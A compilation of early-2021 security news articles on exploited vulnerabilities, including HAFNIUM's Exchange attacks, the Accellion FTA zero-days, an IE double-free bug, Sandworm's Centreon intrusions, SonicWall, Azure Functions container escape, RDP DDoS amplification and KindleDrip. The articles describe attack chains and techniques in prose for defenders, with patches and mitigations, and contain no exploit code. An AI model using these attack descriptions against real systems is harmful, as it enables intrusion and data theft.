HAFNIUM is believed to orchestrate its attacks by leveraging leased virtual private servers in the U.S. in an attempt to cloak its malicious activity.

The three-stage attack involves gaining access to an Exchange Server either with stolen passwords or by using previously undiscovered vulnerabilities, followed by deploying a web shell to control the compromised server remotely. The last link in the attack chain makes use of remote access to plunder mailboxes from an organization's network and export the collected data to file sharing sites like MEGA.

To achieve this, as many as four zero-day vulnerabilities discovered by researchers from Volexity and Dubex are used as part of the attack chain —

CVE-2021-26855: A server-side request forgery (SSRF) vulnerability in Exchange Server
CVE-2021-26857: An insecure deserialization vulnerability in the Unified Messaging service
CVE-2021-26858: A post-authentication arbitrary file write vulnerability in Exchange, and
CVE-2021-27065: A post-authentication arbitrary file write vulnerability in Exchange
Although the vulnerabilities impact Microsoft Exchange Server 2013, Microsoft Exchange Server 2016, and Microsoft Exchange Server 2019, Microsoft said it's updating Exchange Server 2010 for "Defense in Depth" purposes.

Furthermore, since the initial attack requires an untrusted connection to Exchange server port 443, the company notes that organizations can mitigate the issue by restricting untrusted connections or by using a VPN to separate the Exchange server from external access.

Microsoft, besides stressing that the exploits were not connected to the SolarWinds-related breaches, said it has briefed appropriate U.S. government agencies about the new wave of attacks. But the company didn't elaborate on how many organizations were targeted and whether the attacks were successful.

Stating that the intrusion campaigns appeared to have started around January 6, 2021, Volexity cautioned it has detected active in-the-wild exploitation of multiple Microsoft Exchange vulnerabilities used to steal email and compromise networks.

"While the attackers appear to have initially flown largely under the radar by simply stealing emails, they recently pivoted to launching exploits to gain a foothold," Volexity researchers Josh Grunzweig, Matthew Meltzer, Sean Koessel, Steven Adair, and Thomas Lancaster explained in a write-up.

"From Volexity's perspective, this exploitation appears to involve multiple operators using a wide variety of tools and methods for dumping credentials, moving laterally, and further backdooring systems."

Aside from the patches, Microsoft Senior Threat Intelligence Analyst Kevin Beaumont has also created a nmap plugin that can be used to scan a network for potentially vulnerable Microsoft Exchange servers.

Given the severity of the flaws, it's no surprise that patches have been rolled out a week ahead of the company's Patch Tuesday schedule, which is typically reserved for the second Tuesday of each month. Customers using a vulnerable version of Exchange Server are recommended to install the updates immediately to thwart these attacks.

"Even though we've worked quickly to deploy an update for the Hafnium exploits, we know that many nation-state actors and criminal groups will move quickly to take advantage of any unpatched systems," Microsoft's Corporate Vice President of Customer Security, Tom Burt, said. "Promptly applying today's patches is the best protection against this attack.

Hackers Exploit Accellion Zero-Days in Recent Data Theft and Extortion Attacks
23.2.2021 Exploit  Thehackernews

Cybersecurity researchers on Monday tied a string of attacks targeting Accellion File Transfer Appliance (FTA) servers over the past two months to data theft and extortion campaign orchestrated by a cybercrime group called UNC2546.

The attacks, which began in mid-December 2020, involved exploiting multiple zero-day vulnerabilities in the legacy FTA software to install a new web shell named DEWMODE on victim networks and exfiltrating sensitive data, which was then published on a data leak website operated by the CLOP ransomware gang.

But in a twist, no ransomware was actually deployed in any of the recent incidents that hit organizations in the U.S., Singapore, Canada, and the Netherlands, with the actors instead resorting to extortion emails to threaten victims into paying bitcoin ransoms.
According to Risky Business, some of the companies that have had their data listed on the site include Singapore's telecom provider SingTel, the American Bureau of Shipping, law firm Jones Day, the Netherlands-based Fugro, and life sciences company Danaher.

Following the slew of attacks, Accellion has patched four FTA vulnerabilities that were known to be exploited by the threat actors, in addition to incorporating new monitoring and alerting capabilities to flag any suspicious behavior. The flaws are as follows -

CVE-2021-27101 - SQL injection via a crafted Host header
CVE-2021-27102 - OS command execution via a local web service call
CVE-2021-27103 - SSRF via a crafted POST request
CVE-2021-27104 - OS command execution via a crafted POST request
FireEye's Mandiant threat intelligence team, which is leading the incident response efforts, is tracking the follow-on extortion scheme under a separate threat cluster it calls UNC2582 despite "compelling" overlaps identified between the two sets of malicious activities and previous attacks carried out by a financially motivated hacking group dubbed FIN11.

"Many of the organizations compromised by UNC2546 were previously targeted by FIN11," FireEye said. "Some UNC2582 extortion emails observed in January 2021 were sent from IP addresses and/or email accounts used by FIN11 in multiple phishing campaigns between August and December 2020."

Once installed, the DEWMODE web shell was leveraged to download files from compromised FTA instances, leading to the victims receiving extortion emails claiming to be from the "CLOP ransomware team" several weeks later.

Lack of reply in a timely manner would result in additional emails sent to a wider group of recipients in the victim organization as well as its partners containing links to the stolen data, the researchers detailed.

Besides urging its FTA customers to migrate to kiteworks, Accellion said fewer than 100 out of 300 total FTA clients were victims of the attack and that less than 25 appear to have suffered "significant" data theft.

The development comes after grocery chain Kroger disclosed last week that HR data, pharmacy records, and money services records belonging to some customers might have been compromised as a result of the Accellion incident.

Exploit Details Emerge for Unpatched Microsoft Bug
19.2.2021 Exploit  Threatpost

A malicious website or malicious ad can trigger an exploit for the IE zero-day bug, opening the door for data theft and code execution, new analysis notes.

New details have emerged about an unpatched security vulnerability in Microsoft’s Internet Explorer that was recently used in a complex campaign against security researchers. A fresh analysis from 0patch offers further insight into where the bug exists and how it can be triggered in real-world attacks — notably, by just visiting a website.

In early February, cybersecurity researchers at South Korean consultancy ENKI identified a zero-day exploit that it said was used in the researcher attack. The vulnerability in question exists in Microsoft Internet Explorer, and at the time of writing remains unpatched, though Microsoft said it was looking into the bug report.

The attack on researchers had come to light a few days earlier. That campaign, detailed by Google’s Threat Analysis Group (TAG), involved hackers likely linked to North Korea who carried out an elaborate social-engineering effort to set up trusted relationships with security firms. The end goal was infecting these organizations’ systems with custom backdoor malware.

The effort included attackers going so far as to set up their own research blog, multiple Twitter profiles and other social-media accounts in order to look like legitimate security researchers themselves who were looking to “collaborate.”

At the time, TAG noted that it couldn’t determine the mechanism of compromise, and it asked for help from the greater security community.

Microsoft IE Zero-Day Discovered
ENKI heeded that call. It was one of the targeted firms, and when the attackers sent researchers there an MHTML file, under the guise of helping with security research, the firm discovered an embedded malicious exploit for a previously unknown flaw.

“The file…is designed to enable the JavaScript function and read the contents of the article completely when the button action is activated. This is presumed to have led the target to use the Internet Explorer browser,” according to the ENKI advisory (translated with Google Translate). “If script execution is allowed, the additional payload is downloaded twice from the remote site (codevexillium[.]org), and the secondary payload contains the attack code that attacks the vulnerability of the Internet Explorer browser.”

Delivering the exploit in an MHTML file does ensure recipients would open it in Internet Explorer, which is registered to open this file type, according to researchers at 0patch, which released an additional analysis of the bug on Thursday.

“While this delivery method required recipients to confirm a security warning about executing active content, the exploit could be delivered without such warning if the victim visited a malicious web site with Internet Explorer,” according to the posting.

Microsoft has acknowledged ENKI’s report and issued a short statement: “Microsoft has a customer commitment to investigate reported security issues and we will provide updates for impacted devices as soon as possible.”

Microsoft didn’t immediately respond to a request for an update from Threatpost. No CVE has yet been assigned.

More Technical Details Come to Light
In breaking down ENKI’s (non-public) proof-of-concept (PoC) exploit, researchers at 0patch were able to uncover more details on the bug.

“The vulnerability is a ‘double free’ bug that can be triggered with JavaScript code and causes memory corruption in Internet Explorer’s process space,” they explained in the blog posting. “As is often the case, this memory corruption could be carefully managed and turned into arbitrary read/write memory access – which can then be leveraged to arbitrary code execution.”

ENKI’s original analysis did offer some insight on this front:

“Due to the double-free bug, alloc1 and alloc2 functions use different types of objects, but they allocate data to the same memory address space, thus obtaining a Type Confusion condition,” the firm explained in early February. “To execute additional attack code, the attacker creates a Fake ArrayBuffer with buffer address 0x0 and size 0x7FFFFFFF, and then creates a DataView object that can read and write the entire user space memory of the process.”

Neither firm has published exploit or PoC code and won’t until the bug is patched. But 0patch researchers did say that the “root of this vulnerability is not new.”

They explained, “it’s about tricking the browser to delete an object that has already been deleted in some unexpected way that existing sanitization checks don’t notice. In this case, it’s about deleting a node value of an HTML Attribute. The trick is to create an attribute, assign it a value that is not a string or a number, but an object (why is this even allowed?) – then when deleting this attribute, said object makes sure that the attribute is deleted before it gets deleted, so to speak.”

Executing Native Code for Spying
Researchers at 0patch also disclosed additional details on how the bug could be weaponized.

They found that simply opening a malicious website would automatically result in native code execution inside Internet Explorer’s render process. The exploit could also be triggered via a benign website hosting a malicious ad, according to the analysis which opens up several avenues of attack.

Internet Explorer’s render process runs by default in Low Integrity mode, which means that the executed code could read any data from the computer and network that the user can access, ultimately sending it to the attackers in the background, according to 0patch.

“An additional vulnerability would be needed to escape the Low-Integrity sandbox and achieve a long-term compromise of the computer,” researchers explained.

The potential impact of an exploit could be significant, researchers cautioned: “While Internet Explorer is not widely used for browsing websites anymore, it is installed on every Windows computer and (a) opens MHT/MHTML files by default, (b) is being used internally in many large organizations, and (c) executes HTML content inside various Windows applications.”

Fixing the Microsoft IE Zero-Day
0patch has issued a free micropatch to plug the security hole ahead of an official fix. It admitted that it took a different approach from what the Microsoft patch will include.

“We decided to break the obscure browser functionality that allows setting an HTML Attribute value to an object,” researchers said. “We assess this functionality to be useful to very few web developers whose apps are supposed to work with Internet Explorer.”

Microsoft on the other hand “will probably fix the way the attribute node is deleted so that it doesn’t actually get deleted while references to it still exist,” according to the post. “We decided that such approach would simply require too much time for us and would introduce an unnecessary risk of breaking something.”

No one has detailed exactly which Windows or Internet Explorer iterations are vulnerable, a possible clue lies in the Windows versions addressed by the micropatch (32bit and 64bit): Windows 7, Windows 10, Windows Server 2008 R2, Windows Server 2016 and 2019.

“When the social-engineering attack against security researchers by malicious actors out of North Korean was reported in late January 2021, it seemed likely there was more to the effort than was currently known or reported,” Saryu Nayyar, CEO at Gurucul, said via email. “The report by ENKI that the attackers were leveraging a zero-day exploit in Internet Explorer reinforces that assumption. As the extent of the attack becomes more evident more of the techniques they used, including more new exploits, will come to light.”

She added, “With what is already known, it is apparent that even the most experienced security researchers need to remain vigilant. While they have a great deal of knowledge and experience, the attackers are well resourced with new exploit vectors and the skill to create very convincing hooks.”

Malvertisers Exploited WebKit 0-Day to Redirect Browser Users to Scam Sites
17.2.2021 Exploit  Thehackernews

A malvertising group known as "ScamClub" exploited a zero-day vulnerability in WebKit-based browsers to inject malicious payloads that redirected users to fraudulent websites gift card scams.

The attacks, first spotted by ad security firm Confiant in late June 2020, leveraged a bug (CVE-2021–1801) that allowed malicious parties to bypass the iframe sandboxing policy in the browser engine that powers Safari and Google Chrome for iOS and run malicious code.
Specifically, the technique exploited the manner how WebKit handles JavaScript event listeners, thus making it possible to break out of the sandbox associated with an ad's inline frame element despite the presence of "allow-top-navigation-by-user-activation" attribute that explicitly forbids any redirection unless the click event occurs inside the iframe.

To test this hypothesis, the researchers set about creating a simple HTML file containing a cross-origin sandboxed iframe and a button outside it that triggered an event to access the iframe and redirect the clicks to rogue websites.

"The [...] button is outside of the sandboxed frame after all," Confiant researcher Eliya Stein said. "However, if it does redirect, that means we have a browser security bug on our hands, which turned out to be the case when tested on WebKit based browsers, namely Safari on desktop and iOS."

Following responsible disclosure to Apple on June 23, 2020, the tech giant patched WebKit on December 2, 2020, and subsequently addressed the issue "with improved iframe sandbox enforcement" as part of security updates released earlier this month for iOS 14.4 and macOS Big Sur.

Confiant said the operators of ScamClub have delivered more than 50 million malicious impressions over the last 90 days, with as many as 16MM impacted ads being served in a single day.

"On the tactics side, this attacker historically favors what we refer to as a 'bombardment' strategy," Stein elaborated.

"Instead of trying to fly under the radar, they flood the ad tech ecosystem with tons of horrendous demand well aware that the majority of it will be blocked by some kind of gatekeeping, but they do this at incredibly high volumes in the hopes that the small percentage that slips through will do significant damage."

Confiant has also published a list of websites used by the ScamClub group to run its recent scam campaign.

Hackers Exploit IT Monitoring Tool Centreon to Target Several French Entities
16.2.2021  Exploit  Thehackernews

Russia-linked state-sponsored threat actor known as Sandworm has been linked to a three-year-long stealthy operation to hack targets by exploiting an IT monitoring tool called Centreon.

The intrusion campaign — which breached "several French entities" — is said to have started in late 2017 and lasted until 2020, with the attacks particularly impacting web-hosting providers, said the French information security agency ANSSI in an advisory.

"On compromised systems, ANSSI discovered the presence of a backdoor in the form of a webshell dropped on several Centreon servers exposed to the internet," the agency said on Monday. "This backdoor was identified as being the PAS webshell, version number 3.1.4. On the same servers, ANSSI found another backdoor identical to one described by ESET and named Exaramel."

The Russian hacker group (also called APT28, TeleBots, Voodoo Bear, or Iron Viking) is said to be behind some of the most devastating cyberattacks in past years, including that of Ukraine's power grid in 2016, the NotPetya ransomware outbreak of 2017, and the Pyeongchang Winter Olympics in 2018.

password auditor
While the initial attack vector seems unknown as yet, the compromise of victim networks was tied to Centreon, an application, and network monitoring software developed by a French company of the same name.

Centreon, founded in 2005, counts Airbus, Air Caraïbes, ArcelorMittal, BT, Luxottica, Kuehne + Nagel, Ministère de la Justice français, New Zealand Police, PWC Russia, Salomon, Sanofi, and Sephora among its customers. It's not clear how many or which organizations were breached via the software hack.

Compromised servers ran the CENTOS operating system (version 2.5.2), ANSSI said, adding it found on the two different kinds of malware — one publicly available webshell called PAS, and another known as Exaramel, which has been used by Sandworm in previous attacks since 2018.

The web shell comes equipped with features to handle file operations, search the file system, interact with SQL databases, carry out brute-force password attacks against SSH, FTP, POP3, and MySQL, create a reverse shell, and run arbitrary PHP commands.

Exaramel, on the other hand, functions as a remote administration tool capable of shell command execution and copying files to and fro between an attacker-controlled server and the infected system. It also communicates using HTTPS with its command-and-control (C2) server in order to retrieve a list of commands to run.

In addition, ANSSI's investigation revealed the use of common VPN services in order to connect to web shells, with overlaps in C2 infrastructure connecting the operation to Sandworm.

"The intrusion set Sandworm is known to lead consequent intrusion campaigns before focusing on specific targets that fits its strategic interests within the victims pool," the researchers detailed. "The campaign observed by ANSSI fits this behaviour."

In light of the SolarWinds supply-chain attack, it should come as no surprise that monitoring systems such as Centreon have become a lucrative target for bad actors to gain a foothold and laterally move across victim environments. But unlike the former's supply chain compromise, the newly disclosed attacks differ in that they appear to have been carried out by leveraging internet-facing servers running Centreon's software inside the victims' networks.

"It is therefore recommended to update applications as soon as vulnerabilities are public and corrective patches are issued," ANSSI warned. "It is recommended either not to expose these tools' web interfaces to [the] Internet or to restrict such access using non-applicative authentication."

In October 2020, the U.S. government formally charged six Russian military officers for their participation in destructive malware attacks orchestrated by this group, linking the Sandworm threat group to Unit 74455 of the Russian Main Intelligence Directorate (GRU), a military intelligence agency part of the Russian Army.

Attackers Exploit Critical Adobe Flaw to Target Windows Users

10.2.2021  Exploit  Threatpost

A critical vulnerability in Adobe Reader has been exploited in “limited attacks.”

Adobe is warning of a critical vulnerability that has been exploited in the wild to target Adobe Reader users on Windows.

The vulnerability (CVE-2021-21017) has been exploited in “limited attacks,” according to Adobe’s Tuesday advisory, part of its regularly scheduled February updates. The flaw in question is a critical-severity heap-based buffer overflow flaw.

This type of buffer-overflow error occurs when the region of a process’ memory used to store dynamic variables (the heap) can be overwhelmed. If a buffer-overflow occurs, it typically causes the affected program to behave incorrectly. With this flaw in particular, it can be exploited to execute arbitrary code on affected systems.

“Adobe has released security updates for Adobe Acrobat and Reader for Windows and macOS,” said Adobe on Tuesday. “These updates address multiple critical and important vulnerabilities. Successful exploitation could lead to arbitrary code execution in the context of the current user.”

Adobe Flaw: Security Updates
Acrobat is Adobe’s popular family of application software and web services used to view, create and manage files. CVE-2021-21017, which was anonymously reported, affects the following Adobe Acrobat Reader versions:

Acrobat Reader DC versions 2020.013.20074 and earlier for Windows and macOS
Acrobat Reader 2020 versions 2020.001.30018 and earlier for Windows and macOS
Acrobat Reader 2017 versions 2017.011.30188 and earlier for Windows and macOS
The flaw has been patched in the following versions:

Acrobat Reader DC version 2021.001.20135
Acrobat Reader 2020 version 2020.001.30020
Acrobat Reader 2017 version 2017.011.30190
These patches are a priority level 1, which according to Adobe means they resolve “vulnerabilities being targeted, or which have a higher risk of being targeted, by exploit(s) in the wild for a given product version and platform.”

“Adobe recommends administrators install the update as soon as possible. (for example, within 72 hours),” according to its update.

Other Adobe Acrobat and Reader Critical Flaws
Including this exploited flaw, Adobe patched flaws tied to 23 CVEs overall in Acrobat and Reader – including 17 critical-severity CVEs.

Most of these critical flaws could allow for arbitrary code execution, including a path traversal glitch (CVE-2021-21037), integer overflow error (CVE-2021-21036) and out-of-bounds write issues (CVE-2021-21044, CVE-2021-21038). Also patched were buffer overflow flaws (CVE-2021-21058, CVE-2021-21059, CVE-2021-21062, CVE-2021-21063) and use-after-free errors (CVE-2021-21041, CVE-2021-21040, CVE-2021-21039, CVE-2021-21035, CVE-2021-21033, CVE-2021-21028 and CVE-2021-21021).

A critical improper access control flaw (CVE-2021-21045) was also patched that allowed for privilege execution.

Critical Magento Security Updates
In addition to Acrobat and Reader security updates, Adobe also issued patches for critical vulnerabilities in Magento, its e-commerce platform.

Seven critical flaws were patched as part of this security update. All these flaws, if exploited, could lead to arbitrary code execution. These flaws include three security bypass issues (CVE-2021-21015, CVE-2021-21016 and CVE-2021-21025), a command injection flaw (CVE-2021-21018), an XML injection vulnerability (CVE-2021-21019), a file upload allow list bypass (CVE-2021-21014) and a cross-site scripting flaw (CVE-2021-21030).

Affected are Magento Commerce and Magento open source, 2.4.1 and earlier versions (with a fix in 2.4.2); 2.4.0-p1 and earlier versions (with a fix in 2.4.1-p1) and 2.3.6 and earlier versions (with a fix in 2.3.6-p1).

The update is a priority level 2, which according to Adobe “resolves vulnerabilities in a product that has historically been at elevated risk.”

Magento would be categorized as an “elevated risk” because it is commonly targeted by attackers like the Magecart threat group to target e-commerce stores for cyberattacks like web skimming. However, there are currently no known exploits for these flaws, said Adobe.

Other Security Flaws in Adobe Products
Adobe on Tuesday also patched critical-severity flaws in Adobe Photoshop (CVE-2021-21049, CVE-2021-21050, CVE-2021-21048, CVE-2021-21051 and CVE-2021-21047), Adobe Animate (CVE-2021-21052) and Adobe Illustrator (CVE-2021-21053, CVE-2021-21054).

However these patches came with a priority level 3 ranking, which means that they resolve vulnerabilities in a product that “has historically not been a target for attackers.”

For these flaws, “Adobe recommends administrators install the update at their discretion,” according to the security update.

Adobe’s February fixes come on the heels of a busy January security update, when the company patched seven critical vulnerabilities. The impact of the most serious of these flaws ranged from arbitrary code execution to sensitive information disclosure.

Experts warn of active exploitation of SonicWall zero-day in the wild
2.2.2021  Exploit  Securityaffairs

Researchers from the security firm NCC Group warn of the exploitation in the wild of a SonicWall zero-day vulnerability.
Security experts from the firm NCC Group have detected “indiscriminate” exploitation of a SonicWall zero-day in attacks in the wild, ZDNet reported.

NCC Group first disclosed the attacks on SonicWall devices on Sunday but did not provide details about the flaw exploited by the threat actors.

The experts reported the vulnerability to the security provider, they also claim to have identified the same zero-day vulnerability exploited by SolarWinds hackers to breach SonicWall’s internal network.

Anyway, SonicWall did not confirm that the vulnerability under active exploitation is the same involved in the attacks against its infrastructure.

On January, 29 SonicWall announced it is still investigating the presence of a zero-day vulnerability in the Secure Mobile Access (SMA) gateways.
SMA gateways are used by enterprise organizations to provide access to resources on intranets to remote employees.
“As we head into the weekend, we continue to investigate the SMA 100 Series, however the presence of a potential zero-day vulnerability remains unconfirmed.” reads SonicWall’s update.

“We have also analyzed several reports from our customers of potentially compromised SMA 100 series devices. In these cases, we have so far only observed the use of previously stolen credentials to log into the SMA devices. The SMA appliance, due to its nature and due to prevalence of remote work during the pandemic, effectively acts as a “canary” to raising an alert about inappropriate access.”

The NCC team confirmed to have demonstrated how to exploit a possible candidate for the vulnerability.

SonicWall experts pointed out that proof of concept (PoC) exploit code utilizing the Shellshock exploit shared on social media is not effective against its devices.

“We’re also aware of social media posts that shared either supposed proof of concept (PoC) exploit code utilizing the Shellshock exploit, or screenshots of allegedly compromised devices. We have confirmed that the Shellshock attack has been mitigated by patches that we released in 2015. We have also tested the shared PoC code and have so far concluded that it is not effective against firmware released after the 2015 patch.” continues the update. “However, we’ll continue to closely monitor any new posts and investigate new information. This should also serve as a reminder to our customer base to always patch and keep current on internet facing devices.”

The company has released an updated security best practices guide for the SMA 100 series devices.

Hackers Exploiting Critical Zero-Day Bug in SonicWall SMA 100 Devices

2.2.2021  Exploit  Thehackernews

SonicWall on Monday warned of active exploitation attempts against a zero-day vulnerability in its Secure Mobile Access (SMA) 100 series devices.

The flaw, which affects both physical and virtual SMA 100 10.x devices (SMA 200, SMA 210, SMA 400, SMA 410, SMA 500v), came to light after the NCC Group on Sunday alerted it had detected "indiscriminate use of an exploit in the wild."

Details of the exploit have not been disclosed to prevent the zero-day from being exploited further, but a patch is expected to be available by the end of day on February 2, 2021.

password auditor
"A few thousand devices are impacted," SonicWall said in a statement, adding, "SMA 100 firmware prior to 10.x is unaffected by this zero-day vulnerability."

On January 22, The Hacker News exclusively revealed that SonicWall had been breached as a consequence of a coordinated attack on its internal systems by exploiting "probable zero-day vulnerabilities" in its SMA 100 series remote access devices.

Then last week, on January 29, it issued an update stating it had so far only observed the use of previously stolen credentials to log into the SMA 100 series appliances.

While SonicWall has not shared many details about the intrusion citing the ongoing investigation, the latest development points to evidence that a critical zero-day in the SMA 100 series 10.x code may have been exploited to carry out the attack.

SonicWall is internally tracking the vulnerability as SNWLID-2021-0001.

The company said SonicWall firewalls and SMA 1000 series appliances, as well as all respective VPN clients, are unaffected and that they remain safe to use.

In the interim, the company recommends customers enable multi-factor authentication (MFA) and reset user passwords for accounts that utilize the SMA 100 series with 10.X firmware.

"If the SMA 100 series (10.x) is behind a firewall, block all access to the SMA 100 on the firewall," the company said. Users also have the option of shutting down the vulnerable SMA 100 series devices until a patch is available or load firmware version 9.x after a factory default settings reboot.

Exploiting a bug in Azure Functions to escape Docker
1.2.2021  Exploit  Securityaffairs

Expert disclosed an unpatched vulnerability in Microsoft Azure Functions that could be exploited to escape the Docker container hosting them.
Cybersecurity researcher Paul Litvak from Intezer Lab disclosed an unpatched vulnerability in Microsoft Azure Functions that could be exploited by an attacker to escalate privileges and escape the Docker container that hosts them.

The experts with his colleagues was investigating the Azure compute infrastructure.

“We found a new vulnerability in Azure Functions, which would allow an attacker to escalate privileges and escape the Azure Functions Docker container to the Docker host.” reads the post published by Intezer Lab.

“After an internal assessment Microsoft has determined that the vulnerability has no security impact on Function users as the Docker host itself is protected by a Hyper-V boundary. “

Azure Functions is an event-driven, compute-on-demand experience that extends the existing Azure application platform with capabilities to implement code triggered by events occurring in Azure or third party service as well as on-premises systems.
Azure Functions can be triggered by HTTP requests and run for only a few minutes, just in time to handle the event. The user’s code is run on an Azure-managed container and served without requiring the user to manage their own infrastructure. The experts discovered that the code is not segmented securely and could be abused to escape to access the underlying environment.
The experts created an HTTP trigger to gain a foothold over the Function container, then they wrote a reverse shell to connect to their server once the Function was executed in order to operate an interactive shell.

The researchers noticed that they were running as a unprivileged ‘app’ user in an endpoint with a ‘SandboxHost’ hostname, so they used the container to find sockets belonging to processes with “root” privileges.

“We created a demonstration of the vulnerability—mimicking an attacker having execution on Azure Functions and escalating privileges to achieve a full escape to the Docker host.” continues the post.

The researchers found three privileged processes with an open port, a NGINX without known vulnerabilities, and MSI and Mesh processes.

Intezer found a flaw in the “Mesh” process that could be exploited to escalating to root within the container.

In the last phase of the attack, the experts extended privileges assigned to the container to escape the Docker container and run an arbitrary command on the host.

The experts published a PoC exploit code to set up a reverse shell with the squashfs to escalate privileges in Azure Function, and escape the Docker environment.

Experts Detail A Recent Remotely Exploitable Windows Vulnerability
24.1.2021  Exploit  Thehackernews

More details have emerged about a security feature bypass vulnerability in Windows NT LAN Manager (NTLM) that was addressed by Microsoft as part of its monthly Patch Tuesday updates earlier this month.

The flaw, tracked as CVE-2021-1678 (CVSS score 4.3), was described as a "remotely exploitable" flaw found in a vulnerable component bound to the network stack, although exact details of the flaw remained unknown.

Now according to researchers from Crowdstrike, the security bug, if left unpatched, could allow a bad actor to achieve remote code execution via an NTLM relay.

password auditor
"This vulnerability allows an attacker to relay NTLM authentication sessions to an attacked machine, and use a printer spooler MSRPC interface to remotely execute code on the attacked machine," the researchers said in a Friday advisory.

NTLM relay attacks are a kind of man-in-the-middle (MitM) attacks that typically permit attackers with access to a network to intercept legitimate authentication traffic between a client and a server and relay these validated authentication requests in order to access network services.

Successful exploits could also allow an adversary to remotely run code on a Windows machine or move laterally on the network to critical systems such as servers hosting domain controllers by reusing the NTLM credentials directed at the compromised server.

While such attacks can be thwarted by SMB and LDAP signing and turning on Enhanced Protection for Authentication (EPA), CVE-2021-1678 exploits a weakness in MSRPC (Microsoft Remote Procedure Call) that makes it vulnerable to a relay attack.

Specifically, the researchers found that IRemoteWinspool — an RPC interface for remote printer spooler management — could be leveraged to execute a series of RPC operations and write arbitrary files on a target machine using an intercepted NTLM session.

Microsoft, in a support document, said it addressed the vulnerability by "increasing the RPC authentication level and introducing a new policy and registry key to allow customers to disable or enable Enforcement mode on the server-side to increase the authentication level."

In addition to installing the January 12 Windows update, the company has urged organizations to turn on Enforcement mode on the print server, a setting which it says will be enabled on all Windows devices by default starting June 8, 2021.

Threat Actors Can Exploit Windows RDP Servers to Amplify DDoS Attacks
23.1.2021  Exploit  Threatpost

Netscout researchers identify more than 14,000 existing servers that can be abused by ‘the general attack population’ to flood organizations’ networks with traffic.

Cybercriminals can exploit Microsoft Remote Desktop Protocol (RDP) as a powerful tool to amplify distributed denial-of-service (DDoS attacks), new research has found.

Attackers can abuse RDP to launch UDP reflection/amplification attacks with an amplification ratio of 85.9:1, principal engineer Roland Dobbins and senior network security analyst Steinthor Bjarnason from Netscout said in a report published online this week.

However, not all RDP servers can be used in this way. It’s possible only when the service is enabled on port UDP port 3389 running on standard TCP port 3389, researchers said.

Netscout so far has identified more than 14,000 “abusable” Windows RDP servers that can be misused by attackers in DDoS attacks—troubling news at a time when this type of attack is on the rise due to the increased volume of people online during the ongoing coronavirus pandemic.

This risk was highlighted earlier this week when researchers identified a new malware variant dubbed Freakout adding endpoints to a botnet to target Linux devices with DDoS attacks.

What’s more, while initially only advanced attackers with access to “bespoke DDoS attack infrastructure” used this method of amplification, researchers also observed RDP servers being abused in DDoS-for-hire services by so-called “booters,” they said. This means “the general attacker population” can also use this mode of amplification to add heft to their DDoS attacks.

RDP is a part of the Microsoft Windows OS that provides authenticated remote virtual desktop infrastructure (VDI) access to Windows-based workstations and servers. System administrators can configure RDP to run on TCP port 3389 and/or UDP port 3389.

Attackers can send the amplified attack traffic, which is comprised of non-fragmented UDP packets that originate at UDP port 3389, to target a particular IP address and UDP port of choice, researchers said.

“In contrast to legitimate RDP session traffic, the amplified attack packets are consistently 1,260 bytes in length, and are padded with long strings of zeroes,” Dobbins and Bjarnason explained.

Leveraging Windows RDP servers in this way has significant impact on victim organizations, including “partial or full interruption of mission-critical remote-access services,” as well as other service disruptions due to transit capacity consumption and associated effects on network infrastructure, researchers said.

“Wholesale filtering of all UDP/3389-sourced traffic by network operators may potentially overblock legitimate internet traffic, including legitimate RDP remote-session replies,” researchers noted.

To mitigate the use of RDP to amplify DDoS attacks and their related impact, researchers made a number of suggestions to Windows systems administrators. First and foremost they should deploy Windows RDP servers behind VPN concentrators to prevent them from being abused to amplify DDoS attacks, they said.

“Network operators should perform reconnaissance to identify abusable Windows RDP servers on their networks and/or the networks of their downstream customers,” Dobbins and Bjarnason advised. “It is strongly recommended that RDP servers should be accessible only via VPN services in order to shield them from abuse.”

If this mitigation is not possible, however, they “strongly recommended” that at the very least, system administrators disable RDP via UDP port 3389 “as an interim measure,” they said.

Internet access network traffic from internal organizational personnel should be deconflated from internet traffic to/from public-facing internet properties and served via separate upstream internet transit links.

At the same time, network operators should implement Best Current Practices (BCPs) for all relevant network infrastructure, architecture and operations, including “situationally specific network-access policies that only permit internet traffic via required IP protocols and ports, researchers said.

Internet-access network traffic from internal organizational personnel also should be deconflated from internet traffic to/from public-facing internet properties and served via separate upstream internet transit links, they added.

KindleDrip exploit – Hacking a Kindle device with a simple email

23.1.2021  Exploit  Securityaffairs

KindleDrip: Amazon addressed a number of flaws affecting the Kindle e-reader that could have allowed an attacker to take control of victims’ devices.
Security experts at Realmode Labs discovered multiple vulnerabilities in the Kindle e-reader that could have allowed an attacker to take over victims’ devices.
The researchers noticed that the “Send to Kindle” feature allows Kindle users to send e-books to their devices as email attachments, a behavior that could be potentially exploited for malicious purposes, for example sending a malicious e-book to potential victims.
Amazon has addressed a number of flaws in its Kindle e-reader platform that could have allowed an attacker to take control of victims’ devices by simply sending them a malicious e-book.

The experts discovered three vulnerabilities that could be chained (KindleDrip exploit) by a remote attacker to execute code as root on the target’s Kindle. The attacker only needs to know the email address associated with the device of the victim.

“The first vulnerability allowed an attacker to send an e-book to the victim’s Kindle device. Then, the second vulnerability was used to run arbitrary code while the e-book is parsed, under the context of a weak user. The third vulnerability allows the attacker to escalate privileges and run code as root.” reads the post published by the experts.

Chaining the issues the attackers can obtain the device credentials, make purchases on the Kindle store using the victim’s credit card, or sell an e-book on the store and transfer money to their account.

Realmode Labs reported the flaws to Amazon on October 17 and the company released security updates to address them on December 10, 2020.

The Send to Kindle feature allows the Kindle user to send MOBI e-books to their device. Amazon generates for each user a special kindle.com email address that could be used to implement the “Send to Kindle” feature. Users can share the book with their device by sending it as an attachment to this email address from a predefined list of approved emails.

The experts discovered that Amazon did not verify the authenticity of the email sender, this means that attackers can spoof an email address that is present in the list of approved addresses.
“Since many email servers still don’t support authentication, it is not unreasonable to assume that Amazon will not verify the authenticity of the sender.” continues the post.

“To test this, I used an email spoofing service to spoof an email message and send an e-book to my device. To my pleasant surprise, the e-book appeared on the device! To make matters worse, there is no indication that the e-book was received from an email message. It also appeared on the home page of the Kindle with a cover image of our choice, which makes phishing attacks much easier.”

Once the e-book is sent to a target device, the attacker could have exploited a buffer overflow flaw in the JPEG XR image format library as well as a privilege escalation issue in the “stackdumpd” root process to inject arbitrary commands and run the code as root.

Upon opening the e-book and tapping on one of the links in the table of contents, the device will open an HTML page in the browser that contained a specially-crafted JPEG XR image. Once the image is parsed, the malicious code is executed allowing the attacker to carry out multiple malicious activities.

Experts also published a video PoC of the KindleDRIP exploit chain on a new Kindle 10 running firmware version 5.13.2..

Experts warn of scanning activity for critical SAP SolMan flaw after the release of exploit
22.1.2021  Exploit  Securityaffairs

Experts warn of automated scanning activity for servers affected by a critical SAP SolMan flaw after the release of an exploit code.
